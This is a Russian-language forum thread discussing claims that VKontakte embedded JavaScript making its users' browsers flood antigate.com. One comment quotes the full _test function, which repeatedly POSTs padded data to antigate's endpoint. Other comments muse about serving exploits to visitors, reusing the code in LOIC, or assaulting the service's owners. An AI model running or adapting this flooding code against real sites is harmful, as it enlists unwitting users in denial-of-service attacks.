ВКонтакте ДДОСит сервис платного распознавания капчи antigate.com?

Подтверждаю, у меня идут такие же запросы. Вот функция: http://pastebin.com/raw.php?i=6WKnCJmk Функция вызывается не только по onload, она ещё ставит таймаут на собственный запуск каждую секунду.

Красавцы, чо )

Управление К, где ты? Вот тебе уголовщина в чистом виде.

Какая прелесть :-)

Подтверждаю — запросы летят http://clip2net.com/s/1QSLt

> Вот тебе уголовщина в чистом виде. Денежка из кармана уплывает? Уголовщина, не уголовщина — мои симпатии на стороне ВК.

Интересно, за сколько секунд Antigate прилег? У меня function _test() проходит как security error, но она тоже есть.

Уголовщина? Управление К? Антигейт — главное место концентрации всех спамеров. Дуров всё правильно делает.

А когда это Дуров меккой стал? Что он делает правильно? Я считаю с этим должны нужные органы разбираться, как с antigate, так и с выходками Дурова.

Вот наконец-то самый большой ботнет в Рунете нашел себе применение.

Вспоминается история с Премией Рунета. Там, правда, мотивация была другая.

Управлению К не до этого http://sobesednik.ru/news/20120424-upravlenie-k-mvd-mogut-rasformirovat-iz-za-vzyatki

Согласен с Alter Ego Бороться нужно другими методами вот мой скрин: http://goo.gl/01HeI

Антигейтовцам осталось изменить на какое-то время морду, запихав на нее вирусов, и отдавать всем ?first_and_last_warning=on Хотя они не часто из 500-х выходят (но пару раз морда все-таки загрузилась).

>Что он делает правильно? Спамеры — не люди.

Согласен. Наркоманы — тоже не люди. Пойти их мочить? А еще мне курящие не нравятся… Тоже?

Я правильно понимаю, что сейчас вконтакте забивает интернет-каналы всей страны? Что от этого страдает не только сайт антикапчи, но и все промежуточные узлы. А представьте ситуацию, если кто-то выходит через мобильный интернет в области, избыточный траф = избыточные платежи, а если у кого-то канал слабый (например, школы в регионах), то это может привести их к отключению от интернета. И если antigate просто добавит здоровенный файл на тот урл (с разрешением кеширования), то нагрузка в большей степени уйдет на кеширующие сервера и пользователи просто отвалятся. И разделит ли вконтакте ответственность если antigate закинет вредоносный код на ту страницу?

Антигейт закинул туда редирект на xvideos — после чего на ВК убрали редирект. Вот тогда каналы точно забивались :)

Со спамерами только так и надо! Только непонятно, откуда столько кукарекающих анонимов бросилось их защищать. А, нет, [url=http://roem.ru/2012/04/18/addednews46914/?c#message125574]понятно[/url].

Люди с мобильным интернетом обычно пользуются мобильной версией или мобильными приложениями ВКонтакте, а там этого кода нет. А насчёт вредоносного кода хороший вопрос, кстати. Антигейт уже перенаправили адрес.

Георгий (KcepoKc), ну напишите уже в профиле, что вы сотрудник пресс-службы Вконтакте. Как нам, сотрудникам другой компании воспринимать ваши комментарии: как мнение пресс-службы, или как ваше личное мнение (сомневаюсь что оно отличается от пункта 1)?

Так вот кто этот внебрачный сын Редайя. Порнушные методы порнушных королей, не удивительно

Уф,а я то думала.что за гадость тут грузится…

Альтер 12:03:06 > Как нам, сотрудникам другой компании Какой компании? Вы тоже скрываетесь.

Сейчас там function _test(){var fr=utilsNode.appendChild(ce(‘iframe’)),d=fr.contentWindow.document;d.open();d.write(‘<script>var XHR=window.XDomainRequest||window.XMLHttpRequest,xhr=new XHR();xhr.open(«POST»,»http://ant’+’iga’+’te.com/i’+’n.php»,true);xhr.setRequestHeader(«Content-Type»,»application/x-www-form-urlencoded»);var tmp2=»e8532291e45ec27a85e87692e070da98″;for(i=0;i<5;++i)tmp2+=tmp2;xhr.send("method=base64&key=fb856f0ab752e3894fbdb3c4613ca924&body="+tmp2+"&ext=jpg");</sc'+'ript>');d.close();setTimeout(re.pbind(fr),1000);}

«http://ant’+’iga’+’te.com/i’+’n.php» — сразу видно, где «олимпиадники» подрабатывают :))))

О, круто, надо будет взять код на вооружение в LOIC и путин-взрывает-дома

ботнет на 150 миллионов у нас под носом

КсерВКс — пора, собирать ссылки на ваши проконтактовские комментарии в блокнотик и каждый раз отвечать ими

Закон есть закон, а пока мыслим «ну они же хорошие парни, значит им можно» так и живем, с ментами насилующимим бутылками из под шампанского. Они же тоже хорошие парни, им можно

В NoScript разрешил обращение к этому сайту с доверием к ВК посмотрим чего они хотят

Омг, так для вас менты насилующие бутылками — хорошие парни?

ВК стоит на иллюзии, что только они могут производить автоматизацию своей деятельности вокруг какого-либо естественного явления жизни. Что-то вроде их священного права на чужое общение. Вокруг этого «священного права» создаются бесконечные легенды. Хорошие (вк) противопоставляются плохим (все остальные). Ставятся бесконечные кордоны и проблемы, а свои «таможенники» собирают пошлину и «помощь» в преодолении этих проблем. Но суть остается одна — право на общение, это наше право, а не ВК.

Очень хочется услышать комментарий Дурова. Он же здесь появлялся по удобным поводам, пусть явится и по этому, эпичному.

ВК — молодцы .)

Уверен, им теперь не отмыться.

Зачем они на порно перекинули? Как будто в вк его нет?

Про ИПО можно забыть. Как они будут объяснять заграничным пользователям, что регистрируясь вконтакте те попадают в ботнет?

Объяснять будут как всегда — школьники через крышу проникли в офис за залогиненный компутер.

Потратил 80 мегабайт мобильного трафика на скачивание CureIT после того, как у меня вдруг стал открываться xvideos.com I want my money back! >:-)

Поддерживаю данный ход со стороны сайта ВКонтакте, Павлу респект. Вопрос к Павлу, если он зайдет в тред: Было бы классно увидеть в ближайшее время API к данной функции. Имеет смысл ожидать API?

На хабре поднялось уже http://habrahabr.ru/post/142836/#habracut

Павлик заболел основательно… Это тоже самое если бы Facebook начал ежесекундно от каждого пользователя отсылать пост запрос на vk.com. Мотивирую это какими-нибудь личными обидами на vk. Маразм крепчает. Выздоравливайте!

Ну, хоть что то..хотя, в целом смешное действие. Пока спам приносит большие деньги — будут спамить, а в случае с ВКонтакте деньги не просто большие, а очень очень большие ( в 2011 году некоторые умельцы делали по 15 тысяч $ в день, и думаю это не предел. Что действительно надо делать? Создать юридический отдел, который будет абузить и добиваться исполнения требований от провайдеров, хостеров, операторов, контент провайдеров и прочих. Надо создать атмосферу когда Вконтакте будет ассоицироаться с проблемами не только у бабушек, но и у любителей нажиться на этих бабушках. Это вдарит по заработка спамеров, сильно увеличит «цену входа» которая сейчас состоит из всего лишь софта,дедика и акков (~300$) и снизит рентабильность (серые контент провайдеры перестанут работать по ВК, а черные берут в 3 раза больше еще и шейфят трафик. Для острастки можно найти еще и пару жертв спама в ВК и инициировать уголовные дела. Все, я выговарился. П.С. Кстати а если бы антикапча продала трафика на сплойты, ВК бы не слабо выхватил ) ведь у всех ботов был бы акк в вкшный, ну а вреде и угрозе для пользователя я вообще молчу.

«alterneo» Зачем было вставлять код и создавать бот-нет? Развивая тему, почему бы тогда не взять пару-тройку джипов крепких ребят, биты шокеры, травматику и приехать и конкретно опустить владельцев антигейта. А в больнице у них уже появится время на подумать. Типа первое и последнее предупреждение.

В долгосрочной перспективе ВК делает очень полезное дело .) Важно, на чьей стороне симпатии пользователей, а не спамеров и кучки интернет-экспертов, которые поддерживают спамеров потому, что действия ВК кажутся им «сомнительными» .) Принцип меньшего зла.

«Teodorix» ВК — сеть зла. это сильно :)

Вы забыли о еще одной очень важной стороне капчи. Порой это плата за доступ к информации. Именно плата, а не ограничение. Напомню вам про проект decapcha, который был куплен Google. Суть проекта — сделать так, чтобы капчи приносили пользу — повесить на них задачи распознавания сложных мест в отсканированных текстах (на сгибе, на поврежденных носителях и т.д.). Сейчас эта технология применена еще и к распознаванию номеров домов в google-street. Поэтому фактически капча во многих проектах стала не ограничением, а принуждением пользователей к труду взамен на доступ к информации. Различные сервисы антикапчи, позволяют не только масштабировать решение рутинных задач ручной обработки данных, но и получить доступ к таким сервисам не за труд, а за деньги.

бедные-бедные клиенты антигейта, сча срочно переключаются видать на других провайдеров антикапчи. а такой казалось прикольный бизнес — бери себе да капчи распознавай. кто ж мог подумать, что прям так вот, белые проекты, а не конкуренты, ддосить будут? )))))

Знаете, а я лично против такого подхода. Правильно сказали — если я против курящих мне что ходить и бить их?? Естественно это неправильно будет! Бороться надо законными способами, а тут получается, что ВК решил олицетворять мировое добро которое сейчас вдруг победит всё зло? А почему решили что зло действительно им является? Сервис антикапча это всего лишь сервис — и да им пользуются спамеры, но и не только. ВКонтакте тоже пользуются спамеры, так может вконтакте тоже зло? Да и потом — хочешь бороться — неужели нельзя законными методами это делать? p.s. почему я должен участвовать в их инициативе без собственного согласия? я пользуюсь их сервисами, но не подписывался на такое

2 soomrack >Поэтому фактически капча во многих проектах стала не ограничением, а принуждением пользователей к труду взамен на доступ к информации. Различные сервисы антикапчи, позволяют не только масштабировать решение рутинных задач ручной обработки данных, но и получить доступ к таким сервисам не за труд, а за деньги. Если бы Гуглу такое было надо — сделал бы сам доступ за деньги вместо распознавания картинок, а на эти деньги сам бы организовал платное распознавание своих же картинок.

Юр, а что за история с премией?

> Если бы Гуглу такое было надо — сделал бы сам доступ за деньги вместо распознавания картинок, а на эти деньги сам бы организовал платное распознавание своих же картинок. Это повлекло бы кучу юридических обязательств и создало бы большие сложности. Кроме того пользователи не готовы платить деньги, но им не напряжно раз в день потратить 10 сек. (утрирую) и сделать «доброе» дело.

Хм,может я глупая или фаерфокс глючит,но вконтате не запускает Флеш приложения,тоесть ни музыку,ни видео,ни приложения. Все же фаерфокс тупит? Пропробовала через IE — все идет. странно.

Юр, а что за история с премией? http://habrahabr.ru/post/43171/ Как многие помнят, в прошлом году наше участие в конкурсе «Премия рунета» закончилось неприятностями для оргкомитета. Даже десятая часть наших пользователей не смогла проголосовать за ВКонтакте в «Народном голосовании», так как как сайт премии не выдерживал нагрузок из-за количества желающих проголосовать. … Сегодня ночью мы пустили небольшой тест-драйв сайта премии. Сейчас около 10% пользователей ВКонтакте незаметно обращаются к сайту премии, как если бы они хотели посмотреть на страницу голосования. Момент выбран весьма щадяще — сейчас в шестом часу утра в субботу мы наблюдаем недельный и суточный минимум посещаемости Контакта. Но сайт премии, несмотря на весьма низкую загрузку, завис. Если бы мы пригласили пользователей не посмотреть, а «проголосовать», да еще в дневные часы, все было бы совсем печально. (это пост Дурова в своем вк-блоге, на данный момент недоступный)

Методы Дурова сродни его фамилии — дурацкие. Это путь в никуда. Будет полный ППЦ, если все начнут так действовать… Давайте припомним кому еще нахамил Дуров? Похоже, что мэйлру с его пулом социальщины тоже нужно начать ддосить ВК Дурова… А это уже не смешно…

надо было редирект на ФБ делать

На блог президента — эффективнее…

Я как пользователь хочу подать в суд на ВК за использование меня в качестве боевой единицы в DDoS. Как это правильно сделать?

> Я как пользователь хочу подать в суд на ВК за использование меня в качестве боевой единицы в DDoS. Как это правильно сделать? Много фрагов наколотили?

Вот кстати действительно интересно бы услышать мнение официальных лиц контакта на тему «Мы используем незаконные методы борьбы с сервисами, которые нам мешают». Если уж быть белым и пушистым — может имеет смысл в суд сходить? А не ддосить с компов их клиентов. Причем на хабре люди пишут «мне полезла порнуха — я кинулся через gprs качать антивирус». Это конечно для ВК не деньги — но как то некрасиво. Да — что было понятно — я не считаю что антигейт белый и пушистый. Но если хочешь разбираться и оставаться в правовом поле РФ — только по закону — а не по «понятиям».

>> Я как пользователь хочу подать в суд на ВК за использование меня в качестве боевой единицы в DDoS. Как это правильно сделать? Ты не пользователь, ты инструмент. Вещь.

>Причем на хабре люди пишут «мне полезла порнуха — я кинулся через gprs качать антивирус». У меня не полезла. Подозреваю что ни у кого не полезла.

> Ты не пользователь, ты инструмент. Вещь. :-) Транзакция, как [URL=http://www.delicious.com/redirect?url=http//ain.ua/2012/04/24/82022]говорил[/URL] Ашманов.

Очень любопытно, как пацанские методы ведения бизнеса перекочевали от инвесторов ВКонтакта к его руководителям. Далеко пойдут!

Разговор ушел далеко от темы,в суд уж подаете.. Вообще ВК всегда какую-то чушь делает,воду мутит. Хотя черный PR- тоже PR…Дурная слава- тоже слава.

Mary, вы так говорите, будто и не работаете в четырежды проданной компании .)

Teodorix ,я на Goship подписана кст) не распугивайте аудиторию ;) p.s.не против услышать или увидеть примеры черного PR или дурной славы Nival’а *не считая троллинг-форумов* ?

Mary, ой, не надо. В смысле, не будем про дурную славу Нивала, ладно? А то ведь превратить тред в лёгкую головную боль для сотрудников PR департамента нежно любимой компании можно за пять минут .) Лучше спросите коллег .)

Уважаемый KcepoKc ! Я, как представитель пресс-службы Mail.Ru Group, хочу сказать, что на самом деле я (равно как и мои коллеги) сегодня вовсю занимаюсь годовым отчетом, публикация которого произойдет в ближайший час. И, поверьте, это гораздо более серьезное дело, чем ваша писанина от анонимный акканутов. А если вам кажется, что писать замечания и задавать неудобные вопросы могут только сотрудники Mail.Ru Group, вы глубоко ошибаетесь.

Верно. Ещё есть НЛО — оно прилетает и оставляет комментарии на главной.

Странно, что кто-то в этом видит *сервис*. Хотя не так уж и странно — спамеры (включая смошников и сеошников, разумеется) имеют специфические взгляды на мир. Всех этих мудаков не ддосить надо, а по колониям рассаживать.

Такие выводы можно сделать и о Вконтакте: предоставляют хостинг для нелицензионного аудио и видео. Как сами отвечают, так виноваты пользователи — с них взятки гладки. А в чем виноваты владельцы антигейта? В том, что их сервисом спасены пользуются? Так могут и нормально использовать, рекапча в пример. Но как и у Вконтакте с аудио, применение идет в основном не в рамках закона. Вконтакте даже прокомментировать не соизволили. Двойные стандарты везде. А на Mail.ru так не жалеют своего времени.

>Это повлекло бы кучу юридических обязательств и создало бы большие сложности. Кроме того пользователи не готовы платить деньги, но им не напряжно раз в день потратить 10 сек. (утрирую) и сделать «доброе» дело. Если так, то пользователям antigate не нужен, он нужен кому-то другому, кто хочет распознавать много капч и не тратить на это время. Т.е. тому, кто использует чужой функционал автоматизировано и с нарушениями (в обход API).

Сначала Вконтакте включил во все свои страницы фрейм с недоверенного и потенциально вредоносного сайта. Этот фрейм мог содержать все что угодно, включая скрипты, флеши и всякую бяку эксплуатриующую уязвимости в браузерах. Или вывод алерта с приветами Дурову. Но почему-то не содержал. Потом кто-то понял что объобшибся, и вместо фрейма вставил кросс-доменный POST-запрос через аякс, который не работает в большинстве браузеров. То бишь объобшибся еще раз. С учетом «профессионализма команды разработчиков», на DDoS атаку это мало похоже, больше похоже или на неудавшийся хак или на спланированный PR antigate.

Антигейту достаточно теперь просто резать все эти кривые пост-запросы через аякс, благо от запросов клиентов они много чем отилчаются. Им, правда, придется научиться роутеры настраивать, ноэто дело наживное и навык полезный.

Теперь вопрос, станет ли Antigate Watergate’ом?

Детский сад «Ромашка»

>С учетом «профессионализма команды разработчиков», на DDoS атаку это мало похоже, больше похоже или на неудавшийся хак или на спланированный PR antigate. Вот это глубина мысли! Но, говорят, миром правит не тайная ложа, а явная лажа.

о, какие люди! 3APA3A — это тот самый 3APA3A, который с security.nnov.ru?

В конце 90х годов был момент, когда одна рекламная сеть при показе (или клике? боюсь уже ошибиться) на каждый из своих баннеров делала маленький запрос на конкурирующую рекламную сеть. В результате эта вторая сеть, меньших размеров, лежала плашмя; пока они не договорились о каких-то уступках и прогибах с «большой» рекламной сетью.

Ну вот, теперь стало понятно что Дуров имел в виду, говоря «как в большинстве европейских городов».

Уже второй день не могу пробиться на сайт Почты России. Павел, прекращайте уже!

Сижу с планшета Блекберри через мобильный интернет.Роем грузится отлично,контакт висит..

Интересно, до суда это дойдет? Реально им крышу снесло…

Кто с кем судиться-то будет? Частные лица с ВК — вряд ли, а Антигейт уж и подавно — ему чем меньше шумихи, тем лучше.

DDOS это уголовщина, а не гражданский суд значит прокуратура может и сама завести дело и без заявлений

Может, только сначала ей кто-нибудь должен за это заплатить (см. дело Врублевского)

после факов и собачек с языком я думаю им и платить особо не придется

Вот редирект такой совершенно безотвественен со стороны В контакте. А если бы рядом был маленький ребенок, а у меня тут Xvideos открылось? Дуров, о чем вы думаете вообще. Ваше поведение не просто возмутительно, оно безобразно. Я жду ваших извинений и официальных коментариев. Вы подвели своих пользователей. Вы их обманули. Ваша социальная сеть была для меня любимой социальной сетью, однако теперь меня терзают смутные сомнения. Вдруг вы опять провернете что-то такое? Нельзя так поступать. Вы тоже много кому не нравитесь, вас за это не DDoS-ят. Позор. Я думаю, большинство присоединится к моему мнению. Также

Вот редирект такой совершенно безотвественен со стороны В контакте. А если бы рядом был маленький ребенок, а у меня тут Xvideos открылось? Дуров, о чем вы думаете вообще. Ваше поведение не просто возмутительно, оно безобразно. Я жду ваших извинений и официальных коментариев. Вы подвели своих пользователей. Вы их обманули. Ваша социальная сеть была для меня любимой социальной сетью, однако теперь меня терзают смутные сомнения. Вдруг вы опять провернете что-то такое? Нельзя так поступать. Вы тоже много кому не нравитесь, вас за это не DDoS-ят. Позор. Я думаю, большинство присоединится к моему мнению.

Antigate чота протупили совсем, вместо Xvideos нуно было эксплойтов напихать — вот тада бы действительно ботнет душевный вышел. и можно в ответку начать вк дидосить)

Нет, мамаша, я, например, не присоединяюсь. Идите в ЖЭК жалуйтесь. >коментариев комментариев.

Да можно было много всего хорошего сделать, вконтакт же их к себе во фрейм подгружал, значит у них доступ был к их странице. можно было пользователям что-нибудь хорошее на стене написать, например. или дурову привет послать.

У фреймов с разных доменов нет доступа друг к другу

>У фреймов с разных доменов нет доступа друг к другу обсуждали ли уже совсем недавно, причем опять же в посте про вконтакте у дочернего фрейма есть доступ к родительскому

http://roem.ru/2012/04/19/addednews47065/?c#message125961

Не слушайте глупостей, и у дочерних фреймов тоже конечно же нет доступа к родителю, иначе бы все баннеры могли что угодно творить на сайтах, где их вставляют. http://stackoverflow.com/questions/1378433/cross-domain-url-access-from-iframe-using-javascript [QUOTE] I need to access the Parent Domain URL from my Iframe which is in another domain. For example: example.com is my website which is in Iframe of another parent(google.com) domain. Here i need to access the parent domain URL in my example.com. i.e I need to get the URL google.com in my example.com. Parent domain cannot be hard coded. I tried with the following code window.parent.location.href() this results in Access denied error. How to achieve this..? —————————— You might want to take a look at these questions/answers ; they could give you some informations concerning your problem : * cross domain access in iframe from child to parent * javascript access parent DOM across domains? * How to access parent Iframe from javascript To make things short : accessing iframe from another domain is not possible, for security reasons — which explains the error message you are getting. The Same origin policy page on wikipedia brings some informations about that security measure : In a nutshell, the policy permits scripts running on pages originating from the same site to access each other’s methods and properties with no specific restrictions — but prevents access to most methods and properties across pages on different sites. A strict separation between content provided by unrelated sites must be maintained on client side to prevent the loss of data confidentiality or integrity.[/QUOTE] Иногда бывают некоторые способы доступа, но это эксплуатация уязвимостей в браузерах, а не рабочее правило, то есть работать будет только на некоторых версиях.

блин, и на роеме обманули а я Сrio верил :-(